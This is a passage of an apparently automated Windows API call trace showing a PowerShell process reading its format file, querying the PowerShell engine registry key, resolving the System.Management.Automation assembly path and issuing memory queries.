	[0317.086] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.086] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.086] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.086] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.086] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.086] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.087] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.087] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0xf37, lpOverlapped=0x0) returned 1
	[0317.087] ReadFile (in: hFile=0x304, lpBuffer=0x2d3d37f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3d37f*, lpNumberOfBytesRead=0x28ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0317.087] ReadFile (in: hFile=0x304, lpBuffer=0x2d3dce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2d3dce0*, lpNumberOfBytesRead=0x28ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0317.087] CloseHandle (hObject=0x304) returned 1
	[0317.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0317.087] SetErrorMode (uMode=0x1) returned 0x1
	[0317.087] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28ce60 | out: lpFileInformation=0x28ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0317.087] SetErrorMode (uMode=0x1) returned 0x1
	[0317.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0317.088] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cf48 | out: phkResult=0x28cf48*=0x304) returned 0x0
	[0317.088] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cecc, lpData=0x0, lpcbData=0x28cec8*=0x0 | out: lpType=0x28cecc*=0x1, lpData=0x0, lpcbData=0x28cec8*=0x56) returned 0x0
	[0317.088] CoTaskMemAlloc (cb=0x5a) returned 0x1b7e4740
	[0317.088] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce9c, lpData=0x1b7e4740, lpcbData=0x28ce98*=0x56 | out: lpType=0x28ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28ce98*=0x56) returned 0x0
	[0317.088] CoTaskMemFree (pv=0x1b7e4740) 
	[0317.088] RegCloseKey (hKey=0x304) returned 0x0
	[0317.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0317.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0317.093] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xa838cadc, Data2=0x1dd1, Data3=0x4a1b, Data4=([0]=0xb0, [1]=0x68, [2]=0x9c, [3]=0xbe, [4]=0xb3, [5]=0xe3, [6]=0xb2, [7]=0x82))) returned 0x0
	[0317.093] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x21edcd90, Data2=0x9d5c, Data3=0x4ef5, Data4=([0]=0x83, [1]=0xf1, [2]=0xd5, [3]=0xf5, [4]=0x4d, [5]=0x86, [6]=0xe3, [7]=0xda))) returned 0x0
	[0317.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.739] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xb299260f, Data2=0x770e, Data3=0x45fa, Data4=([0]=0x8a, [1]=0x45, [2]=0xfb, [3]=0xb5, [4]=0xc4, [5]=0xee, [6]=0xa0, [7]=0x16))) returned 0x0
	[0317.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.743] VirtualQuery (in: lpAddress=0x28b180, lpBuffer=0x28c040, dwLength=0x30 | out: lpBuffer=0x28c040*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.745] VirtualQuery (in: lpAddress=0x28b210, lpBuffer=0x28c0d0, dwLength=0x30 | out: lpBuffer=0x28c0d0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.747] VirtualQuery (in: lpAddress=0x28b990, lpBuffer=0x28c850, dwLength=0x30 | out: lpBuffer=0x28c850*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.748] VirtualQuery (in: lpAddress=0x28b990, lpBuffer=0x28c850, dwLength=0x30 | out: lpBuffer=0x28c850*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.750] VirtualQuery (in: lpAddress=0x28b990, lpBuffer=0x28c850, dwLength=0x30 | out: lpBuffer=0x28c850*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.751] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.751] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.751] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.751] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.751] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.751] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.752] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.752] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.752] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.752] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.752] VirtualQuery (in: lpAddress=0x28b980, lpBuffer=0x28c840, dwLength=0x30 | out: lpBuffer=0x28c840*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.752] VirtualQuery (in: lpAddress=0x28b5c0, lpBuffer=0x28c480, dwLength=0x30 | out: lpBuffer=0x28c480*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.752] VirtualQuery (in: lpAddress=0x28b8f0, lpBuffer=0x28c7b0, dwLength=0x30 | out: lpBuffer=0x28c7b0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
